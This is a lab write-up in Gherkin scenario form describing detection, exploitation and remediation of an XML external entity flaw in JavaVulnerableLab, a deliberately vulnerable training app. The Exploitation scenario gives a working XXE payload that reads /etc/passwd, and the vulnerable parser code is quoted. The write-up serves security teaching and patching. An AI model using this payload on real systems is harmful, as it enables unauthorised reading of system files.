## Version 1.4.1
## language: en

Feature:

  TOE:
    JavaVulnerableLab
  Location:
    http://http://127.0.0.1:8080/JavaVulnerableLab/
  CWE:
    CWE-0611: Improper Restriction of XML External Entity Reference|
  Rule:
    Rule.173 Discard unsafe inputs
  Goal:
    Execute XXE commands
  Recommendation:
    Disable DTD

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    | Ubuntu          |     20.4    |
    | Mozilla firefox |     80.0    |
    | ZAP             |     2.8.0   |
  TOE information:
    Given I am accessing locally to the site 127.0.0.1:8080/JavaVulnerableLab
    And I enter the site
    When it shows me a message
    """
    Welcome to Java Vulnerable Lab!

    A Deliberately vulnerable Web Application built on JAVA designed to
    teach Web Application Security.
    """
    And the copyrights belong to Cyber Security & Privacy Foundation
    Then I can see that uses MySQL
    And I can conclude that query chaining is not possible


  Scenario: Normal use case
    Given I access to the site
    And I see a buttons bar with six different options
    """
    Home, Vulnerability, Forum, Login, Register, Contact
    """
    Then I navigate through the options to end up in External Entity
    """
    Vulnerability > A1 Injection > XML injection > External Entity
    """
    And I can see [evidence](image1.png)
    When I click on 'Send Request' button
    Then neo user information its display [evidence](image2.png)
    """
    Result:
    ---------------------
    username : Neo
    email : neo@matrix
    """
    And I open ZAP to see what's sending  [evidence](image3.png)

  Scenario: Static detection
    Given I see the controllers
    Then I conclude that the page is load from xxe.jsp
    """
    http://127.0.0.1:8080/JavaVulnerableLab/vulnerability/Injection/xxe.jsp
    """
    Then I look at the source code
    And I can see [evidence](image4.png)
    Then I look at controllers
    And I find 'xxe.java' [evidence](image5.png)
    When I inspect it I can see [evidence](image6.png)
    Then I can conclude that vulnerability goes from line 44 to 55
    """
    44 InputStream xml=request.getInputStream();
    45 DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    46 DocumentBuilder builder = factory.newDocumentBuilder();
    47 InputSource is = new InputSource(xml);
    48 Document doc = builder.parse(is);
    49 Element element = doc.getDocumentElement();
    50 NodeList nodes = element.getChildNodes();
    51 out.print("<br/>Result:<br/>");
    52 out.print("---------------------<br/>");
    53 for (int i = 0; i < nodes.getLength(); i++) {
    54 out.print(nodes.item(i).getNodeName()+" : " + nodes.item(i)
                                                        .getTextContent());
    55 out.print("<br/>");
    """
    Then I see that DTD is not disable
    And it allows XML injection

  Scenario: Dynamic detection
    Given I acces de site
    And I open ZAP
    Then I create a breakpoint to intercept requests [evidence](image7.png)
    When I click on Send Request
    And I change request body
    """
    <?xml version="1.0" encoding="UTF-8"?><users><username>Neo</username>
    <email>neo@matrix</email></users> >
    <!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
    """
    Then I can see a normal xml exception [evidence](image8.png)
    """
    org.xml.sax.SAXParseException; Premature end of file.
    """
    And I conclude that it's vulnerable to XML injection

  Scenario: Exploitation
    Given xxe page
    Then I create a breakpoint to intercept POST requests
    """
    Location: Request header
    Match: Contains
    String: POST
    """
    When I click on the 'Send request' Button
    And I use ZAP to change the request body to:
    """
    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmli [
    <!ELEMENT xmli ANY>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">]><xmli> &xxe; </xmli>
    """
    Then I look at the response body in ZAP
    And I can see the passwd body [evidence](image8.png)

  Scenario: Remediation
    Given The OWASP Cheat Sheet Series
    Then I search for XML remediation
    And I find
    """
    The safest way to prevent XXE is always to disable DTDs (External Entities)
    completely. Depending on the parser, the method should be similar
    to the following:
    factory.setFeature(
      "http://apache.org/xml/features/disallow-doctype-decl", true);
    """
    Then I open 'xxe.java' file
    And I add the necessary command [evidence](image9.png)
    When I open 'xxe.jsp' page
    And I click on 'Send request' button
    Then I apply the same payload
    And I can see [evidence](image10.png)
    """
    org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 48; DOCTYPE is
    disallowed when the feature
    "http://apache.org/xml/features/disallow-doctype-decl" set to true.
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.7/10 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (High) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.6/10 (High) - CR:H/IR:X/AR:X/

  Scenario: Correlations
    No correlations have been found to this date {2020-09-24}
